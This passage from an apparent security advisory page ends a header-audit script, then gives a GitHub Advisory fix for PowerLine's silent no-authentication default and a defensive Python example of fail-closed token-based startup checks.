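    ("X-Frame-Options", "DENY"),
    ("X-Content-Type-Options", "nosniff"),
    ("Set-Cookie", "grackle_session=abc123; HttpOnly; SameSite=Lax; Path=/; Secure; Max-Age=3600"),
]


if __name__ == "__main__":
    print("before:", audit_response(BEFORE))
    print("after: ", audit_response(AFTER))
```

The audit deliberately accepts `'unsafe-inline'` in `style-src`, as the shipped policy does; it is a weaker position than for scripts, but inline styles are far less useful to an attacker than inline script. Run the audit against the proxy's output as well as the origin's if a reverse proxy is used, since a proxy that rewrites headers can drop what the origin set.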

Source: GitHub Advisory Database

Fix (GHSA-xq7h-vwjp-5vrh, @grackle-ai/powerline): Update to version 0.70.1, which requires an explicit `--no-auth` flag to run without authentication instead of silently defaulting to no auth: the server now refuses to start without a token unless `--no-auth` is given. As a workaround for earlier versions, always provide `--token` or set the `GRACKLE_POWERLINE_TOKEN` environment variable when starting PowerLine.
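The fail-closed startup rule described in the fix, as an added example that is not PowerLine's code. It resolves the authentication mode before a socket is bound, treats every ambiguous combination as a hard error, and adds one check the advisory's fix does not mention: `--no-auth` is refused on a non-loopback bind address, since that is exactly the "accidentally exposed" case. The per-request token comparison uses a constant-time compare. The flag names `--token` and `--no-auth` and the `GRACKLE_POWERLINE_TOKEN` variable are the ones on this page; the minimum token length and the helper names are assumptions.

```python
import hmac
import os

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


class StartupError(RuntimeError):
    """Raised when the server would otherwise start in an unintended state."""


def resolve_auth(token=None, no_auth=False, bind="127.0.0.1", env=None):
    """Decide the auth mode before binding a socket. Returns ("token", value) or
    ("none", None); anything ambiguous is a hard error rather than a silent default."""
    env = os.environ if env is None else env
    token = token or env.get("GRACKLE_POWERLINE_TOKEN")
    if token and no_auth:
        raise StartupError("--no-auth and a token were both given; pick one")
    if token:
        if len(token) < 16:   # assumed minimum; short tokens fall to online guessing
            raise StartupError("token is too short to resist online guessing")
        return ("token", token)
    if not no_auth:
        raise StartupError("no token configured; pass --token, set GRACKLE_POWERLINE_TOKEN, "
                           "or pass --no-auth to run unauthenticated on purpose")
    if bind not in LOOPBACK:
        raise StartupError(f"--no-auth with bind address {bind}: anyone who can reach the port "
                           "could execute code and read credentials")
    return ("none", None)


def authorize(presented, expected):
    """Per-request check: constant-time comparison so timing does not leak the token."""
    if not presented or not expected:
        return False
    return hmac.compare_digest(presented.encode(), expected.encode())


def startup_outcome(**kwargs):
    """Helper for tabulating scenarios with an empty environment: the mode chosen,
    or the error message."""
    try:
        return resolve_auth(env={}, **kwargs)[0]
    except StartupError as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    print("nothing given:          ", startup_outcome())
    print("token given:            ", startup_outcome(token="k" * 32))
    print("--no-auth on loopback:  ", startup_outcome(no_auth=True))
    print("--no-auth on 0.0.0.0:   ", startup_outcome(no_auth=True, bind="0.0.0.0"))
```

A loopback bind is not a guarantee of isolation: a container publishing the port, an SSH or kubectl port-forward, or a proxy on the same host all expose it. The bind-address check catches the obvious misconfiguration; the token requirement is what protects the other cases.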

Source: GitHub Advisory Database